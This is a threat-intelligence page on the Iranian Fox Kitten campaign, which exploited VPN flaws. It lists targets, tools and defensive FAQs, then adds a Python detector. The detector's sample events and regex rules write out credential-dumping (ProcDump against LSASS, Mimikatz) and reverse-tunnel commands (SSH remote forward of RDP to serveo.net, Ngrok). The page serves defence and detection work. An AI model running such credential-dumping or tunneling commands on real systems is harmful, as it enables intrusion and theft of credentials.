Fox Kitten Campaign: Iranian APTs Target Global Infrastructure via VPN Exploits
- Actor Motivations: Espionage, Exfiltration
- Attack Vectors: Broken Authentication, Vulnerability Exploitation, Backdoor, Dropper, RAT, Spyware, Trojan
- Attack Complexity: Medium
- Threat Risk: High Impact / High Probability
Threat Overview
Iranian APT groups APT34 and APT33 jointly operated the Fox Kitten campaign from 2017 to 2019, exploiting VPN vulnerabilities (e.g., Pulse Secure CVE-2019-11510, Fortinet CVE-2018-13379) to breach networks across Israel, the US, Gulf states, and Europe. Targeted sectors included IT, telecommunications, oil and gas, aviation, government, and security. The attackers established persistence using custom and open-source tools, including SSH tunnels, RDP proxies, webshells, and credential dumping via Mimikatz and ProcDump. Tools like Ngrok and Serveo enabled data exfiltration. The infrastructure supported both espionage and potential destructive operations tied to malware such as ZeroCleare and Dustman.
Detected Targets
| Type | Description | Confidence |
|---|---|---|
| Sector | Defense | Verified |
| Sector | Government Agencies and Services | Verified |
| Sector | Information Technology | Verified |
| Sector | Aerospace | Verified |
| Sector | Oil and Gas | Verified |
| Sector | Telecommunication | Verified |
| Sector | Utilities | Verified |
| Region | Australia | Verified |
| Region | Austria | Verified |
| Region | Finland | Verified |
| Region | France | Verified |
| Region | Germany | Verified |
| Region | Hungary | Verified |
| Region | Israel | Verified |
| Region | Italy | Verified |
| Region | Kuwait | Verified |
| Region | Lebanon | Verified |
| Region | Poland | Verified |
| Region | Saudi Arabia | Verified |
| Region | United Arab Emirates | Verified |
| Region | United States | Verified |
Exploited Vulnerabilities
Extracted IOCs
FAQs
Understanding the Fox Kitten Cyber-Espionage Campaign
A long-running Iranian cyber-espionage operation called “Fox Kitten” infiltrated networks of dozens of organizations worldwide by exploiting VPN vulnerabilities and deploying custom malware and remote access tools.
The campaign is linked to Iranian state-sponsored groups, primarily APT34 (OilRig), with possible collaboration from APT33 (Elfin) and APT39 (Chafer).
The main objectives were long-term access, espionage, data theft, and possibly the future deployment of destructive malware like ZeroCleare or Dustman.
Targets included companies and institutions in Israel, the U.S., Gulf countries, and across Europe and Australia, focusing on sectors like oil & gas, aviation, IT, and government.
The attackers exploited known security flaws in VPN services to break into networks, then used tools such as RDP tunnels, webshells, and stolen credentials to maintain access.
The targeted sectors often hold sensitive data and intellectual property relevant to Iran's geopolitical and strategic interests.
The attackers used a mix of self-developed tools (e.g., POWSSHNET, STSRCheck), open-source tools (JuicyPotato, Invoke-TheHash), and legitimate remote access tools such as Ngrok and PuTTY.
The campaign was highly targeted but geographically widespread, with persistent attacks focused on strategically valuable organizations.
Apply security patches promptly, monitor for unusual remote access activity, disable unused services, and deploy endpoint protections that can detect credential theft and tunneling activity.
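The monitoring advice above (detecting credential theft and tunneling) as an added example that is not part of the original page: a small Python detector run over constructed process-creation events that models the tools named in this campaign (ProcDump against LSASS, Mimikatz, Ngrok/Serveo, SSH reverse tunnels exposing RDP, and shells spawned by a web server worker as a webshell indicator). The pipe-separated event format, rule names, host names and sample command lines are all assumptions made for the example.

```python
import re

# Constructed sample process-creation events (not real telemetry from the campaign):
# timestamp|host|user|parent_image|image|command_line
SAMPLE_EVENTS = """\
2019-08-12T03:14:07Z|WEB01|NT AUTHORITY\\SYSTEM|w3wp.exe|cmd.exe|cmd.exe /c whoami
2019-08-12T03:15:22Z|WEB01|NT AUTHORITY\\SYSTEM|cmd.exe|procdump64.exe|procdump64.exe -accepteula -ma lsass.exe C:\\Windows\\Temp\\l.dmp
2019-08-12T03:16:40Z|WEB01|NT AUTHORITY\\SYSTEM|cmd.exe|ngrok.exe|ngrok.exe tcp 3389
2019-08-12T03:18:01Z|WEB01|NT AUTHORITY\\SYSTEM|cmd.exe|ssh.exe|ssh.exe -R 0:localhost:3389 serveo.net
2019-08-12T09:02:11Z|DEV07|CORP\\jdoe|explorer.exe|code.exe|code.exe C:\\src\\app
2019-08-12T09:05:30Z|DEV07|CORP\\jdoe|code.exe|ssh.exe|ssh.exe jdoe@build01 -p 22
"""

# Command-line rules: each is (rule name, compiled pattern). Matching is case-insensitive.
COMMAND_LINE_RULES = [
    ("credential theft: LSASS memory dump via ProcDump",
     re.compile(r"procdump.*\blsass\b", re.I)),
    ("credential theft: Mimikatz module invocation",
     re.compile(r"mimikatz|sekurlsa::", re.I)),
    ("tunneling: public reverse-tunnel service (Ngrok/Serveo)",
     re.compile(r"\bngrok\b|\bserveo\.net\b", re.I)),
    ("tunneling: SSH remote port forward exposing RDP (3389)",
     re.compile(r"\bssh\S*\s.*-R\s+\S*:3389\b", re.I)),
]
# Parent/child rule: a web server worker spawning a shell is a classic webshell indicator.
WEB_WORKERS = {"w3wp.exe", "httpd.exe", "nginx.exe", "php-cgi.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}

def parse_event(line):
    """Split one pipe-separated event into a dict; image names are lower-cased for matching."""
    ts, host, user, parent, image, cmd = line.split("|", 5)
    return {"ts": ts, "host": host, "user": user, "parent": parent.lower(),
            "image": image.lower(), "cmd": cmd}

def scan(events_text):
    """Return one (host, image, rule) tuple for every rule each event triggers."""
    findings = []
    for line in events_text.splitlines():
        if not line.strip():
            continue
        ev = parse_event(line)
        if ev["parent"] in WEB_WORKERS and ev["image"] in SHELLS:
            findings.append((ev["host"], ev["image"], "webshell: web server worker spawned a shell"))
        for name, pattern in COMMAND_LINE_RULES:
            if pattern.search(ev["cmd"]):
                findings.append((ev["host"], ev["image"], name))
    return findings

def hosts_with_findings(findings):
    """Distinct hosts that produced at least one finding, sorted for stable output."""
    return sorted({host for host, _, _ in findings})

if __name__ == "__main__":
    for host, image, rule in scan(SAMPLE_EVENTS):
        print(f"{host:6} {image:15} {rule}")
```

The benign developer SSH session on DEV07 produces no finding, while the single reverse-tunnel command on WEB01 trips both tunneling rules, which is the kind of stacked signal worth escalating.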